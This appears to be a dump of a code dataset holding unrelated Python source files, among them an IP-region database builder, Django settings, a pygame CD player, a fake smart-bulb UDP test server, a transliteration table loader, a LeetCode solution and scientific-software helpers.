id
stringlengths 1
8
| text
stringlengths 6
1.05M
| dataset_id
stringclasses 1
value |
---|---|---|
4970496 | <reponame>theSage21/gmailcopy
import sqlite3
import arrow
def convert_arrowdatetime(s):
return arrow.get(s)
def adapt_arrowdatetime(adt):
return adt.isoformat()
sqlite3.register_adapter(arrow.arrow.Arrow, adapt_arrowdatetime)
sqlite3.register_converter("timestamp", convert_arrowdatetime)
| StarcoderdataPython |
12800360 | #!/usr/bin/env python
# coding: utf-8
import os
import struct
import sys
import socket
current_path = os.path.dirname(os.path.abspath(__file__))
launcher_path = os.path.abspath( os.path.join(current_path, os.pardir, os.pardir, "launcher"))
root_path = os.path.abspath(os.path.join(current_path, os.pardir, os.pardir))
top_path = os.path.abspath(os.path.join(root_path, os.pardir, os.pardir))
data_path = os.path.join(top_path, 'data', "smart_router")
if __name__ == '__main__':
python_path = os.path.join(root_path, 'python27', '1.0')
noarch_lib = os.path.abspath(os.path.join(python_path, 'lib', 'noarch'))
sys.path.append(noarch_lib)
import utils
from xlog import getLogger
xlog = getLogger("smart_router")
class IpRegion(object):
cn_ipv4_range = os.path.join(current_path, "cn_ipv4_range.txt")
cn_ipdb = os.path.join(data_path, "cn_ipdb.dat")
def __init__(self):
self.cn = "CN"
self.ipdb = self.load_db()
def load_db(self):
if not os.path.isfile(self.cn_ipdb):
self.generate_db()
with open(self.cn_ipdb, 'rb') as f:
# 读取 IP 范围数据长度 BE Ulong -> int
data_len, = struct.unpack('>L', f.read(4))
# 读取索引数据
index = f.read(224 * 4)
# 读取 IP 范围数据
data = f.read(data_len)
# 简单验证结束
if f.read(3) != b'end':
raise ValueError('%s file format error' % self.cn_ipdb)
# 读取更新信息
self.update = f.read().decode('ascii')
# 格式化并缓存索引数据
# 使用 struct.unpack 一次性分割数据效率更高
# 每 4 字节为一个索引范围 fip:BE short -> int,对应 IP 范围序数
self.index = struct.unpack('>' + 'h' * (224 * 2), index)
# 每 8 字节对应一段直连 IP 范围和一段非直连 IP 范围
self.data = struct.unpack('4s' * (data_len // 4), data)
def check_ip(self, ip):
if ":" in ip:
return False
#转换 IP 为 BE Uint32,实际类型 bytes
nip = socket.inet_aton(ip)
#确定索引范围
index = self.index
fip = ord(nip[0])
#从 224 开始都属于保留地址
if fip >= 224:
return True
fip *= 2
lo = index[fip]
if lo < 0:
return False
hi = index[fip + 1]
#与 IP 范围比较确定 IP 位置
data = self.data
while lo < hi:
mid = (lo + hi) // 2
if data[mid] > nip:
hi = mid
else:
lo = mid + 1
#根据位置序数奇偶确定是否属于直连 IP
return lo & 1
def check_ips(self, ips):
for ipd in ips:
if "|" in ipd:
ipl = ipd.split("|")
ip = ipl[0]
else:
ip = ipd
try:
if self.check_ip(ip):
return True
except Exception as e:
xlog.exception("check ip %s fail:%r", ip, e)
return False
def generate_db(self):
keeprange = (
'0.0.0.0/8', # 本地网络
'10.0.0.0/8', # 私有网络
'172.16.17.32/10', # 地址共享(运营商 NAT)
'127.0.0.0/8', # 环回地址
'169.254.0.0/16', # 链路本地
'172.16.0.0/12', # 私有网络
'192.0.0.0/24', # 保留地址(IANA)
'192.0.2.0/24', # TEST-NET-1
'192.168.127.12/24', # 6to4 中继
'192.168.0.0/16', # 私有网络
'198.18.0.0/15', # 网络基准测试
'198.51.100.0/24', # TEST-NET-2
'203.0.113.0/24', # TEST-NET-3
# 连续地址直到 IP 结束,特殊处理
# '192.168.127.12/4', #组播地址(D类)
# '240.0.0.0/4', #保留地址(E类)
)
keeplist = []
for iprange in keeprange:
ip, mask = iprange.split('/')
keeplist.append((utils.ip_string_to_num(ip), 32 - int(mask)))
mask_dict = dict((str(2 ** i), i) for i in range(8, 25))
def int2bytes2(n, pack=struct.pack):
'''将整数转换为大端序字节'''
return pack('>H', n)
# return bytes(map(lambda b: (-1 >> b & 255), (8, 0)))
def int2bytes4(n, pack=struct.pack):
'''将整数转换为大端序字节'''
return pack('>I', n)
# return bytes(map(lambda b: (n >> b & 255), (24, 16, 8, 0)))
def bytes2int(s):
nchars = len(s)
# string to int or long. Type depends on nchars
x = sum(ord(s[byte]) << 8 * (nchars - byte - 1) for byte in range(nchars))
return x
# +---------+
# | 4 bytes | <- data length
# +---------------+
# | 224 * 4 bytes | <- first ip number index
# +---------------+
# | 2n * 4 bytes | <- cn ip ranges data
# +------------------------+
# | b'end' and update info | <- end verify
# +------------------------+
lastip_s = 0
lastip_e = 0
index = {}
index_n = 0
index_fip = -1
offset = 0
padding = b'\xff\xff'
update = ""
iplist = []
fdi = open(self.cn_ipv4_range,"r")
for line in fdi.readlines():
lp = line.split()
iplist.append((utils.ip_string_to_num(lp[0]), mask_dict[lp[1]]))
iplist.extend(keeplist)
# 排序,不然无法处理
iplist.sort(key=lambda x: x[0])
# 随便算一下
buffering = len(iplist) * 8 + 224 * 4 + 64 + 4
buffer = bytearray(buffering)
for ip, mask in iplist:
ip_s = ip >> mask << mask
ip_e = (ip >> mask) + 1 << mask
# 判断连续
if ip_s <= lastip_e:
# 判断覆盖
if ip_e > lastip_e:
lastip_e = ip_e
continue
# 排除初始值
if lastip_e:
# 一段范围分为包含和排除
buffer[offset:] = lastip_s = int2bytes4(lastip_s)
buffer[offset + 4:] = int2bytes4(lastip_e)
# 一个索引分为开始和结束
fip = ord(lastip_s[0]) * 2
if fip != index_fip:
# 前一个索引结束,序数多 1
# 避免无法搜索从当前索引结尾地址到下个索引开始地址
index[index_fip + 1] = index_b = int2bytes2(index_n)
# 当前索引开始
index[fip] = index_b
index_fip = fip
index_n += 2
offset += 8
lastip_s = ip_s
lastip_e = ip_e
# 添加最后一段范围
buffer[offset:] = lastip_s = int2bytes4(lastip_s)
buffer[offset + 4:] = int2bytes4(lastip_e)
fip = ord(lastip_s[0]) * 2
if fip != index_fip:
index[index_fip + 1] = index_b = int2bytes2(index_n)
index[fip] = index_b
index_n += 2
offset += 8
# 添加最后一个结束索引
index[fip + 1] = int2bytes2(index_n)
# 写入文件
fd = open(self.cn_ipdb, 'wb', buffering)
fd.write(int2bytes4(offset))
for i in xrange(224 * 2):
fd.write(index.get(i, padding))
fd.write(buffer[:offset])
fd.write('endCN IP from ')
fd.write(update.encode(u'ascii'))
count = int(index_n // 2)
fd.write(', range count: %d' % count)
fd.close()
xlog.debug('include IP range number:%s' % count)
xlog.debug('save to file:%s' % self.cn_ipdb)
class UpdateIpRange(object):
cn_ipv4_range = os.path.join(current_path, "cn_ipv4_range.txt")
def __init__(self):
fn = os.path.join(data_path, "apnic.txt")
self.download_apnic(fn)
self.save_apnic_cniplist(fn)
def download_apnic(self, fn):
import subprocess
import sys
import urllib2
url = 'https://ftp.apnic.net/apnic/stats/apnic/delegated-apnic-latest'
try:
data = subprocess.check_output(['wget', url, '-O-'])
except (OSError, AttributeError):
print >> sys.stderr, "Fetching data from apnic.net, " \
"it might take a few minutes, please wait..."
data = urllib2.urlopen(url).read()
with open(fn, "w") as f:
f.write(data)
return data
def save_apnic_cniplist(self, fn):
try:
fd = open(fn, "r")
fw = open(self.cn_ipv4_range, "w")
for line in fd.readlines():
if line.startswith(b'apnic|CN|ipv4'):
ip = line.decode().split('|')
if len(ip) > 5:
fw.write("%s %s\n" % (ip[3], ip[4]))
except Exception as e:
xlog.exception("parse_apnic_cniplist %s e:%r", fn, e)
if __name__ == '__main__':
#up = UpdateIpRange()
ipr = IpRegion()
print(ipr.check_ip("8.8.8.8"))
print(ipr.check_ip("172.16.58.3")) | StarcoderdataPython |
5117496 | """
Django settings for ebdjango project.
Generated by 'django-admin startproject' using Django 2.1.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Check whether we are running in Linux system and go into debug mode if it Windows
if os.name == 'nt':
DEBUG = True
else:
DEBUG = False
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '<KEY>'
# SECURITY WARNING: don't run with debug turned on in production!
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'resume',
'frontend',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'ebdjango.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'ebdjango.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
if 'RDS_DB_NAME' in os.environ:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': os.environ['RDS_DB_NAME'],
'USER': os.environ['RDS_USERNAME'],
'PASSWORD': os.environ['RDS_PASSWORD'],
'HOST': os.environ['RDS_HOSTNAME'],
'PORT': os.environ['RDS_PORT'],
}
}
else:
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.postgresql_psycopg2',
# 'NAME': 'djangodev',
# 'USER': 'db_django',
# 'PASSWORD': '<PASSWORD>!',
# 'HOST': 'djangodev.cvpnrhsskucg.us-east-1.rds.amazonaws.com',
# 'PORT': '5432',
# }
# }
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'postgres',
'USER': 'postgres',
'PASSWORD': '<PASSWORD>!',
'HOST': '',
'PORT': '5432',
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Brussels'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
# Security settings
if not DEBUG:
SECURE_SSL_REDIRECT = True
SESSION_COOKIE_SECURE = True
CSRF_COOKIE_SECURE = True
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
else:
SECURE_SSL_REDIRECT = False
SESSION_COOKIE_SECURE = False
CSRF_COOKIE_SECURE = False
# REST API security settings
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': [
'rest_framework.permissions.AllowAny',
]
} | StarcoderdataPython |
9744220 | import pygame.cdrom as face
def main():
face.init()
count = face.get_count()
if count == 0:
raw_input('There is no cdrom drive.')
elif count == 1:
cmd(face.CD(0))
else:
num = which_CD(count)
if num != -1:
cmd(face.CD(num))
face.quit()
def which_CD(maximum):
print 'You have %s cdrom drives.' % maximum
while True:
try:
num = int(raw_input('What cdrom drive do you want to use? '))
except ValueError:
print 'Please try typing a number.'
except:
return -1
else:
if 0 < num <= maximum:
return num - 1
print 'The number is out of range.'
def cmd(disc):
disc.init()
total = disc.get_numtracks()
table = map(disc.get_track_audio, range(total))
if sum(table) == 0:
print 'This is not an audio CD.'
else:
index = {}
count = 0
for i, b in enumerate(table):
if b:
count += 1
index[count] = i
cmd_line(disc, index)
disc.stop()
disc.quit()
def cmd_line(disc, index):
while True:
prompt = get_prompt()
if prompt == 'nop':
pass
elif prompt == 'help':
print 'help: get this message'
print 'nop: does nothing'
print 'total: shows total tracks'
print 'play: plays the selected track'
print 'quit: leaves the commmand line'
elif prompt == 'total':
print 'There are %s tracks.' % len(index)
elif prompt == 'play':
track = get_track(len(index))
if track != -1:
disc.play(index[track])
else:
print 'Okay ...'
elif prompt == 'quit':
return
else:
print '"%s" cannot be understood.' % prompt
def get_prompt():
try:
return raw_input('>>> ').lower()
except:
return 'nop'
def get_track(maximum):
while True:
try:
num = int(raw_input('What track should be played? '))
except ValueError:
print 'Please try typing a number.'
except:
return -1
else:
if 0 < num <= maximum:
return num
print 'The number is out of range.'
if __name__ == '__main__':
main()
| StarcoderdataPython |
1961216 | import os;
import util;
def main():
path_meta='/disk2/res11/tubePatches';
out_commands='/disk2/res11/commands_deleteAllImages.txt';
dirs=[os.path.join(path_meta,dir_curr) for dir_curr in os.listdir(path_meta) if os.path.isdir(os.path.join(path_meta,dir_curr))];
print len(dirs);
commands=[];
for dir_curr in dirs:
dirs_in=[os.path.join(dir_curr,dir_in) for dir_in in os.listdir(dir_curr) if os.path.isdir(os.path.join(dir_curr,dir_in))];
commands.extend(['rm -v '+dir_in+'/*.jpg' for dir_in in dirs_in]);
print len(commands);
print commands[:10];
util.writeFile(out_commands,commands);
if __name__=='__main__':
main(); | StarcoderdataPython |
157375 | default_app_config = 'business.staff_accounts.apps.UserManagementConfig'
"""
This APP is for management of users
Functions:-
Adding staff Users and giving them initial details
-Department
-Staff Type
-Departmental,General Managers have predefined roles depending on the departments they can access
"""
| StarcoderdataPython |
113423 | <reponame>Ezra/musa-guesser
# -*- encoding: utf-8 -*-
"""
Provide conversion between Musa and other scripts, initially IPA
"""
from __future__ import absolute_import, division, print_function, unicode_literals
__author__ = "<NAME>"
__version__ = "0.1.0"
__license__ = "BSD"
import codecs
import collections
import csv
import itertools
import sys
def raw_open(filename):
if sys.version_info[0] < 3:
infile = open(filename, 'rb')
else:
infile = open(filename, 'r', newline='', encoding='utf8')
return infile
def load_tables(limit=None):
with raw_open('musa_table.csv') as csvfile:
reader = csv.reader(csvfile)
reader.__next__() # skip header
# musa char to list of ipa readings
musa_to_ipas = collections.defaultdict(list)
# ipa sequence to list of musa chars
ipa_to_musas = collections.defaultdict(list)
# for speed, test with just the head
if limit:
reader = itertools.islice(reader, limit)
for row in reader:
codepoint, trans, ipa_string, uni = row
musa_char = chr(int(codepoint, 16))
ipas = ipa_string.split()
if trans == 'xd': # interpunct <=> space
ipas.append(' ')
# build the data structures
musa_to_ipas[musa_char] = ipas
for ipa in ipas:
ipa_to_musas[ipa].append(musa_char)
return musa_to_ipas, ipa_to_musas
def test_it():
musa_to_ipas, ipa_to_musas = load_tables(limit=10)
for d in [musa_to_ipas, ipa_to_musas]:
for k, vs in d.items():
if vs:
print(k)
for v in vs:
print('\t', v)
if __name__ == '__main__':
test_it()
else:
# load for importing
musa_to_ipas, ipa_to_musas = load_tables()
| StarcoderdataPython |
8194189 | <gh_stars>10-100
# Write your code here
n,x = input().split()
n = int(n)
x = int(x)
l = list(map(int,input().split()))
count = 0
flag = 0
for i in l:
if i <= x :
count += 1
else :
flag += 1
if flag == 2:
break
print(count)
| StarcoderdataPython |
1653609 | """Setup the file structure for the software. Specifies several folders:
software_dir: path of installation
"""
import inspect
import os
import warnings
from socket import getfqdn
import pandas as pd
from immutabledict import immutabledict
import typing as ty
import dddm
import numpy as np
export, __all__ = dddm.exporter()
__all__ += ['log']
context = {}
log = dddm.utils.get_logger('dddm')
_naive_tmp = '/tmp/'
_host = getfqdn()
base_detectors = [
dddm.detectors.examples.XenonSimple,
dddm.detectors.examples.ArgonSimple,
dddm.detectors.examples.GermaniumSimple,
dddm.detectors.xenon_nt.XenonNtNr,
dddm.detectors.xenon_nt.XenonNtMigdal,
dddm.detectors.super_cdms.SuperCdmsHvGeNr,
dddm.detectors.super_cdms.SuperCdmsHvSiNr,
dddm.detectors.super_cdms.SuperCdmsIzipGeNr,
dddm.detectors.super_cdms.SuperCdmsIzipSiNr,
dddm.detectors.super_cdms.SuperCdmsHvGeMigdal,
dddm.detectors.super_cdms.SuperCdmsHvSiMigdal,
dddm.detectors.super_cdms.SuperCdmsIzipGeMigdal,
dddm.detectors.super_cdms.SuperCdmsIzipSiMigdal,
]
class Context:
"""Centralized object for managing:
- configurations
- files
- detector objects
"""
_directories = None
_detector_registry = None
_samplers = immutabledict({
'nestle': dddm.samplers.nestle.NestleSampler,
'multinest': dddm.samplers.pymultinest.MultiNestSampler,
'emcee': dddm.samplers.emcee.MCMCStatModel,
'multinest_combined': dddm.samplers.multi_detectors.CombinedMultinest,
'nestle_combined': dddm.samplers.multi_detectors.CombinedNestle,
})
_halo_classes = immutabledict({
'shm': dddm.SHM,
'shielded_shm': dddm.ShieldedSHM,
})
def register(self, detector: dddm.Experiment):
"""Register a detector to the context"""
if self._detector_registry is None:
self._detector_registry = {}
existing_detector = self._detector_registry.get(detector.detector_name)
if existing_detector is not None:
log.warning(f'replacing {existing_detector} with {detector}')
self._check_detector_is_valid(detector)
self._detector_registry[detector.detector_name] = detector
def set_paths(self, paths: dict, tolerant=False):
if self._directories is None:
self._directories = {}
for reference, path in paths.items():
if not os.path.exists(path):
try:
os.mkdir(path)
except Exception as e:
if tolerant:
warnings.warn(f'Could not find {path} for {reference}', UserWarning)
else:
raise FileNotFoundError(
f'Could not find {path} for {reference}'
) from e
result = {**self._directories.copy(), **paths}
self._directories = result
def show_folders(self):
result = {'name': list(self._directories.keys())}
result['path'] = [self._directories[name] for name in result['name']]
result['exists'] = [os.path.exists(p) for p in result['path']]
result['n_files'] = [(len(os.listdir(p)) if os.path.exists(p) else 0) for p in
result['path']]
return pd.DataFrame(result)
def get_detector(self, detector: str, **kwargs):
if detector not in self._detector_registry:
raise NotImplementedError(f'{detector} not in {self.detectors}')
return self._detector_registry[detector](**kwargs)
def get_sampler_for_detector(self,
wimp_mass,
cross_section,
sampler_name: str,
detector_name: ty.Union[str, list, tuple],
prior: ty.Union[str, dict],
halo_name='shm',
detector_kwargs: dict = None,
halo_kwargs: dict = None,
sampler_kwargs: dict = None,
fit_parameters=dddm.statistics.get_param_list(),
):
self._check_sampler_args(wimp_mass, cross_section, sampler_name, detector_name, prior,
halo_name, detector_kwargs, halo_kwargs, sampler_kwargs,
fit_parameters)
sampler_class = self._samplers[sampler_name]
# If any class needs any of the paths, provide those here.
sampler_kwargs = self._add_folders_to_kwargs(sampler_class, sampler_kwargs)
halo_kwargs = self._add_folders_to_kwargs(
self._halo_classes.get(halo_name), halo_kwargs)
halo_model = self._halo_classes[halo_name](**halo_kwargs)
# TODO instead, create a super detector instead of smaller ones
if isinstance(detector_name, (list, tuple)):
if not sampler_class.allow_multiple_detectors:
raise NotImplementedError(f'{sampler_class} does not allow multiple detectors')
detector_instance = [
self.get_detector(
det,
**self._add_folders_to_kwargs(self._detector_registry.get(det),
detector_kwargs)
)
for det in detector_name]
if halo_name == 'shielded_shm':
if len(locations := {d.location for d in detector_instance}) > 1:
raise ValueError(
f'Running with multiple locations for shielded_shm is not allowed. Got {locations}')
halo_kwargs.setdefault('log_mass', np.log10(wimp_mass))
halo_kwargs.setdefault('log_cross_section', np.log10(cross_section))
halo_kwargs.setdefault('location', list(locations)[0])
spectrum_instance = [dddm.DetectorSpectrum(
experiment=d, dark_matter_model=halo_model)
for d in detector_instance]
else:
detector_kwargs = self._add_folders_to_kwargs(
self._detector_registry.get(detector_name), detector_kwargs)
detector_instance = self.get_detector(detector_name, **detector_kwargs)
spectrum_instance = dddm.DetectorSpectrum(experiment=detector_instance,
dark_matter_model=halo_model)
if isinstance(prior, str):
prior = dddm.get_priors(prior)
return sampler_class(wimp_mass=wimp_mass,
cross_section=cross_section,
spectrum_class=spectrum_instance,
prior=prior,
fit_parameters=fit_parameters,
**sampler_kwargs
)
def _check_sampler_args(self,
wimp_mass,
cross_section,
sampler_name: str,
detector_name: ty.Union[str, list, tuple],
prior: ty.Union[str, dict],
halo_name='shm',
detector_kwargs: dict = None,
halo_kwargs: dict = None,
sampler_kwargs: dict = None,
fit_parameters=dddm.statistics.get_param_list(),
):
for det in dddm.utils.to_str_tuple(detector_name):
assert det in self._detector_registry, f'{det} is unknown'
assert wimp_mass < 200 and wimp_mass > 0.001, f'{wimp_mass} invalid'
assert np.log10(cross_section) < -20 and np.log10(
cross_section) > -60, f'{cross_section} invalid'
assert sampler_name in self._samplers, f'choose from {self._samplers}, got {sampler_name}'
assert isinstance(prior, (str, dict, immutabledict)), f'invalid {prior}'
assert halo_name in self._halo_classes, f'invalid {halo_name}'
def _add_folders_to_kwargs(self, function, current_kwargs: ty.Union[None, dict]) -> dict:
if function is None:
return
if current_kwargs is None:
current_kwargs = {}
takes = inspect.getfullargspec(function).args
for directory, path in self._directories.items():
if directory in takes:
current_kwargs.update({directory: path})
return current_kwargs
@property
def detectors(self):
return sorted(list(self._detector_registry.keys()))
@staticmethod
def _check_detector_is_valid(detector: dddm.Experiment):
detector()._check_class()
@export
def base_context():
context = Context()
installation_folder = dddm.__path__[0]
default_context = {
'software_dir': installation_folder,
'results_dir': os.path.join(installation_folder, 'DD_DM_targets_data'),
'spectra_files': os.path.join(installation_folder, 'DD_DM_targets_spectra'),
'verne_folder': _get_verne_folder(),
'verne_files': _get_verne_folder(),
'tmp_folder': get_temp(),
}
context.set_paths(default_context)
for detector in base_detectors:
context.register(detector)
return context
def _get_verne_folder():
if not dddm.utils.is_installed('verne'):
return './verne'
import verne
return os.path.join(os.path.split(verne.__path__[0])[0], 'results')
def get_temp():
if 'TMPDIR' in os.environ and os.access(os.environ['TMPDIR'], os.W_OK):
tmp_folder = os.environ['TMPDIR']
elif 'TMP' in os.environ and os.access(os.environ['TMP'], os.W_OK):
tmp_folder = os.environ['TMP']
elif os.path.exists(_naive_tmp) and os.access(_naive_tmp, os.W_OK):
tmp_folder = _naive_tmp
else:
raise FileNotFoundError('No temp folder available')
return tmp_folder
def open_save_dir(save_as, base_dir=None, force_index=False, _hash=None):
"""
:param save_as: requested name of folder to open in the result folder
:param base_dir: folder where the save_as dir is to be saved in.
This is the results folder by default
:param force_index: option to force to write to a number (must be an
override!)
:param _hash: add a has to save_as dir to avoid duplicate naming
conventions while running multiple jobs
:return: the name of the folder as was saveable (usually input +
some number)
"""
if base_dir is None:
raise ValueError(save_as, base_dir, force_index, _hash)
if force_index:
results_path = os.path.join(base_dir, save_as + str(force_index))
elif _hash is None:
if force_index is not False:
raise ValueError(
f'do not set _hash to {_hash} and force_index to '
f'{force_index} simultaneously'
)
results_path = dddm.utils._folders_plus_one(base_dir, save_as)
else:
results_path = os.path.join(base_dir, save_as + '_HASH' + str(_hash))
dddm.utils.check_folder_for_file(os.path.join(results_path, "some_file_goes_here"))
log.info('open_save_dir::\tusing ' + results_path)
return results_path
| StarcoderdataPython |
5025839 | """Start up a fake bulb to test features without a real bulb."""
import json
import socketserver
import threading
from typing import Any, Callable, Dict
def get_initial_pilot() -> Dict[str, Any]:
return {
"method": "getPilot",
"env": "pro",
"result": {
"mac": "ABCABCABCABC",
"rssi": -62,
"src": "",
"state": False,
"sceneId": 0,
"r": 255,
"g": 127,
"b": 0,
"c": 0,
"w": 0,
"temp": 0,
"dimming": 13,
},
}
def get_initial_sys_config() -> Dict[str, Any]:
return {
"method": "getSystemConfig",
"env": "pro",
"result": {
"mac": "a8bb5006033d",
"homeId": 653906,
"roomId": 989983,
"moduleName": "",
"fwVersion": "1.21.0",
"groupId": 0,
"drvConf": [20, 2],
"ewf": [255, 0, 255, 255, 0, 0, 0],
"ewfHex": "ff00ffff000000",
"ping": 0,
},
}
BULB_JSON_ERROR = b'{"env":"pro","error":{"code":-32700,"message":"Parse error"}}'
class BulbUDPRequestHandlerBase(socketserver.DatagramRequestHandler):
"""Class for UDP handler."""
pilot_state: Dict[str, Any] # Will be set by constructor for the actual class
sys_config: Dict[str, Any] # Will be set by constructor for the actual class
def handle(self) -> None:
"""Handle the request."""
data = self.rfile.readline().strip()
print(f"Request:{data!r}")
try:
json_data: Dict[str, Any] = dict(json.loads(data.decode()))
except json.JSONDecodeError:
self.wfile.write(BULB_JSON_ERROR)
return
method = str(json_data["method"])
if method == "setPilot":
return_data = self.setPilot(json_data)
self.wfile.write(return_data)
if method == "getPilot":
print(f"Response:{json.dumps(self.pilot_state)!r}")
self.wfile.write(bytes(json.dumps(self.pilot_state), "utf-8"))
if method == "getSystemConfig":
self.wfile.write(bytes(json.dumps(self.sys_config), "utf-8"))
def setPilot(self, json_data: Dict[str, Any]) -> bytes:
"""Change the values in the state."""
for name, value in json_data["params"].items():
self.pilot_state["result"][name] = value
return b'{"method":"setPilot","env":"pro","result":{"success":true}}'
def make_udp_fake_bulb_server(module_name: str) -> socketserver.ThreadingUDPServer:
"""Configure a fake bulb instance."""
pilot_state = get_initial_pilot()
sys_config = get_initial_sys_config()
sys_config["result"]["moduleName"] = module_name
BulbUDPRequestHandler = type(
"BulbUDPRequestHandler",
(BulbUDPRequestHandlerBase,),
{
"pilot_state": pilot_state,
"sys_config": sys_config,
},
)
udp_server = socketserver.ThreadingUDPServer(
server_address=("127.0.0.1", 38899),
RequestHandlerClass=BulbUDPRequestHandler,
)
return udp_server
def startup_bulb(module_name: str = "ESP01_SHRGB_03") -> Callable[[], Any]:
"""Start up the bulb. Returns a function to shut it down."""
server = make_udp_fake_bulb_server(module_name)
thread = threading.Thread(target=server.serve_forever)
thread.start()
return server.shutdown
| StarcoderdataPython |
4906969 | <gh_stars>10-100
'''
Description:
Given a non-empty special binary tree consisting of nodes with the non-negative value, where each node in this tree has exactly two or zero sub-node. If the node has two sub-nodes, then this node's value is the smaller value among its two sub-nodes. More formally, the property root.val = min(root.left.val, root.right.val) always holds.
Given such a binary tree, you need to output the second minimum value in the set made of all the nodes' value in the whole tree.
If no such second minimum value exists, output -1 instead.
Example 1:
Input:
2
/ \
2 5
/ \
5 7
Output: 5
Explanation: The smallest value is 2, the second smallest value is 5.
Example 2:
Input:
2
/ \
2 2
Output: -1
Explanation: The smallest value is 2, but there isn't any second smallest value.
'''
# Definition for a binary tree node.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def findSecondMinimumValue(self, root: TreeNode) -> int:
first_minimum = root.val if (root) else (-1)
upper_bound = 2**31
second_minimum = upper_bound
def helper( node: TreeNode ):
if node:
helper( node.left )
helper( node.right )
nonlocal first_minimum, second_minimum
if node.val != first_minimum:
second_minimum = min( second_minimum, node.val)
# -------------------------------------------------------------
helper( root)
return second_minimum if second_minimum != upper_bound else -1
# n : the number of nodes in binary tree
## Time Complexity: O( n )
#
# The overhead in time is the cost DFS traversal, which is of O( n )
## Space Comlexity: O( n )
#
# The overhead in space is the storage for recursion call stack, which is of O( n )
def test_bench():
# Test-case #1
root_1 = TreeNode( 2 )
root_1.left = TreeNode( 2 )
root_1.right = TreeNode( 5 )
root_1.right.left = TreeNode( 5 )
root_1.right.right = TreeNode( 7 )
# expected output:
'''
5
'''
print( Solution().findSecondMinimumValue( root = root_1 ) )
# -----------------------------------
# Test-case #2
root_2 = TreeNode( 2 )
root_2.left = TreeNode(2)
root_2.right = TreeNode(2)
# expected output:
'''
-1
'''
print( Solution().findSecondMinimumValue( root = root_2 ) )
if __name__ == '__main__':
test_bench() | StarcoderdataPython |
3261931 | """
PyTorch-based implementations for the CATE estimators.
"""
from .flextenet import FlexTENet
from .pseudo_outcome_nets import (
DRLearner,
PWLearner,
RALearner,
RLearner,
ULearner,
XLearner,
)
from .representation_nets import DragonNet, TARNet
from .slearner import SLearner
from .snet import SNet
from .tlearner import TLearner
__all__ = [
"TLearner",
"SLearner",
"TARNet",
"DragonNet",
"XLearner",
"RLearner",
"ULearner",
"RALearner",
"PWLearner",
"DRLearner",
"SNet",
"FlexTENet",
]
| StarcoderdataPython |
3523733 | import abc
import logging
import os
import types
from substratools import utils
from substratools.workspace import Workspace
logger = logging.getLogger(__name__)
REQUIRED_FUNCTIONS = set([
'get_X',
'get_y',
'fake_X',
'fake_y',
'get_predictions',
'save_predictions',
])
class Opener(abc.ABC):
"""Dataset opener abstract base class.
To define a new opener script, subclass this class and implement the
following abstract methods:
- #Opener.get_X()
- #Opener.get_y()
- #Opener.fake_X()
- #Opener.fake_y()
- #Opener.get_predictions()
- #Opener.save_predictions()
# Example
```python
import os
import pandas as pd
import string
import numpy as np
import substratools as tools
class DummyOpener(tools.Opener):
def get_X(self, folders):
return [
pd.read_csv(os.path.join(folder, 'train.csv'))
for folder in folders
]
def get_y(self, folders):
return [
pd.read_csv(os.path.join(folder, 'y.csv'))
for folder in folders
]
def fake_X(self):
return [] # compute random fake data
def fake_y(self):
return [] # compute random fake data
def save_predictions(self, y_pred, path):
with open(path, 'w') as fp:
y_pred.to_csv(fp, index=False)
def get_predictions(self, path):
return pd.read_csv(path)
```
"""
@abc.abstractmethod
def get_X(self, folders):
"""Load feature data from data sample folders.
# Arguments
folders: list of folders. Each folder represents a data sample.
# Returns
data: data object.
"""
raise NotImplementedError
@abc.abstractmethod
def get_y(self, folders):
"""Load labels from data sample folders.
# Arguments
folders: list of folders. Each folder represents a data sample.
# Returns
data: data labels object.
"""
raise NotImplementedError
@abc.abstractmethod
def fake_X(self):
"""Generate a fake matrix of features for offline testing.
# Returns
data: data labels object.
"""
raise NotImplementedError
@abc.abstractmethod
def fake_y(self):
"""Generate a fake target variable vector for offline testing.
# Returns
